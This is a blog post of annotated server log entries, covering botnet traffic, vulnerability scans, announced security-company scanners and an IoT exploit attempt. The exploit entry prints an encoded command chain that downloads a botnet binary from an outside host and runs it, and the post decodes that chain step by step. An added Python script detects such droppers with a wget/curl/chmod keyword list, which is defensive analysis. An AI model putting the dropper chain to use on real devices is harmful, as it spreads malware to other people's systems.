Date: 5 October 2025

  • Server log notes

    I've been running a server for a while now, without Cloudflare, and every day I get to see plenty of log entries.
    Below are a few of the more interesting ones I've come across.

    The zombie army

    121.29.178.2X - - [04/Oct/2025:::06 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
    58.212.237.24X - - [04/Oct/2025:::13 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
    111.113.88.25X - - [04/Oct/2025:::08 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
    121.29.178.13X - - [04/Oct/2025:::20 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) 

    Poor botnets from all sorts of IP ranges passing through my homepage, though there's really nothing much on it.

    🛒 Automated vulnerability scanning

    • Behaviour: 20+ admin interfaces of different systems tried within 2 seconds
    • Scan targets:
      • WordPress plugins (6 of them)
      • Database admin (phpMyAdmin)
      • Microservice platform (Nacos)
      • Enterprise software (Yonyou CWbase)
    • Status: 97% returned 404. Nothing was actually blocked; those paths simply do not exist on this server, which is the only reason the scan came up empty

    Lesson: modern scanners systematically probe every common service path, regardless of what the target actually runs

    An interesting crawler

    92.119.36.14X - - [04/Oct/2025:00::00 +0800] "POST / HTTP/1.1" 200 12077 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
    92.119.36.11X - - [04/Oct/2025:00::01 +0800] "POST / HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"
    92.119.36.10X - - [04/Oct/2025:00::02 +0800] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"
    92.119.36.15X - - [04/Oct/2025:00::03 +0800] "POST / HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"

    lol, <play>withme</>

    Some internet companies

    Palo Alto Networks' official security scanner

    62.216.149.18X - - [05/Oct/2025:::43 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 138 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
    205.210.31.X - - [05/Oct/2025::29 +0800] "GET / HTTP/1.1" 301 5 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
    205.210.31.X - - [05/Oct/2025::29 +0800] "GET / HTTP/1.1" 200 12077 "http://--my-url-not-shown--/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
    • Behaviour: first asks for /.well-known/security.txt (the standard location for a site's security contact, which this server does not serve, hence the 404), then fetches the homepage for its assessment
    • Distinctive feature: the User-Agent states who they are and links to documentation about the scan
    • Status: 200 OK – normal response

    “Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity”

    Lesson: scans from top-tier security companies are transparent, above-board internet-wide surveys

    Nokia's scanner

    216.180.246.18X - - [04/Oct/2025::56 +0800] "GET / HTTP/1.1" 200 12077 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
    216.180.246.18X - - [04/Oct/2025::33 +0800] "GET /favicon.ico HTTP/1.1" 404 138 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'

    The nasty attackers

    An IoT exploit attempt

    144.172.100.17X - - [04/Oct/2025::04 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F103.77..50%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 138 "-" "Mozilla/5.0"

    Attack flow

    The whole chain is delivered URL-encoded in the mdc parameter of a POST to /device.rsp, meant to be run by the target device as a single shell command line. Decoded, it is:

    • Step 1: cd /tmp  # change to the temp directory (writable on almost every embedded device, wiped on reboot)
    • Step 2: rm boatnet.arm7  # remove any old copy, if one exists
    • Step 3: wget http://103.77.—.50/hiddenbin/boatnet.arm7  # download the malware
    • Step 4: chmod 777 *  # make everything in the directory executable
    • Step 5: ./boatnet.arm7 tbk  # run the botnet binary (the name suggests an ARMv7 build)
    Lesson: IoT devices are a prime botnet target; keeping systems updated matters
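    Decoding that request in code, as an added example that is not part of the original post: the script pulls the request target out of a log line, percent-decodes every query parameter, picks out the one that looks like a shell dropper, splits the chain on shell operators so each step is visible, and extracts the download URL as the indicator worth blocking. It reuses the device.rsp line shown above (download host masked exactly as on the page) plus one constructed benign request for contrast; the list of dropper keywords is an assumption to extend.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Words that almost never belong in a legitimate query string but are the
# bread and butter of IoT "download and run" payloads (assumed list, extend it).
DROPPER_WORDS = ("wget", "curl", "tftp", "chmod", "busybox", "/tmp", "/bin/sh")

# The request part of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Shell chaining operators: ; && || |
CHAIN_RE = re.compile(r"\s*(?:;|&&|\|\|?)\s*")

def decode_query(log_line):
    """Return the request's query parameters as {name: [values]}, percent-decoded.
    parse_qs splits on '&' before decoding, so an encoded ';' (%3B) inside a
    value survives as part of the payload instead of being treated as a separator."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    return parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)

def injected_commands(log_line):
    """Find the first parameter that looks like a shell dropper and return its
    command chain as a list of individual steps; [] when nothing looks injected."""
    for values in decode_query(log_line).values():
        for value in values:
            if any(word in value for word in DROPPER_WORDS):
                return [step for step in CHAIN_RE.split(value) if step]
    return []

def payload_urls(commands):
    """Pull download URLs out of the chain: the indicator worth blocking or hunting for."""
    return [tok for cmd in commands for tok in cmd.split()
            if tok.startswith(("http://", "https://", "ftp://", "tftp://"))]

# The device.rsp request from the log above (download host masked exactly as on the page).
DVR_ATTACK_LINE = (
    '144.172.100.17X - - [04/Oct/2025::04 +0800] "POST /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20'
    'http%3A%2F%2F103.77..50%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20'
    '.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 138 "-" "Mozilla/5.0"'
)

# Constructed benign request for contrast: an ordinary search query string.
BENIGN_LINE = ('198.51.100.4 - - [04/Oct/2025:03:20:10 +0800] '
               '"GET /search?q=tmp+files&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    steps = injected_commands(DVR_ATTACK_LINE)
    for n, step in enumerate(steps, 1):
        print(f"step {n}: {step}")
    print("payload URLs:", payload_urls(steps))
    print("benign:", injected_commands(BENIGN_LINE))
```

    Splitting on `;`, `&&` and `|` rather than on `;` alone matters in practice: many droppers chain with `&&` or pipe `wget -O-` straight into `sh`, and a splitter that only knows `;` would report the whole thing as one opaque step.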

    A persistent attacker

    7.60.141.15X - - [04/Oct/2025::59 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 138 "-" "-"

    This attacker has already tried the LuCI exploit against me twice. I really am not an IoT device.

    Other exploit attempts

    WordPress exploits, exposed .git probes, backdoor probes, XML exploits and many, many more... easily a hundred of these classic attack attempts every day.

    Wrap-up

    It feels pretty nice seeing my site get all this traffic every day, even if none of it is from normal visitors. Reading the logs each day I can pretty much tell what each of them is after, which counts as learning too.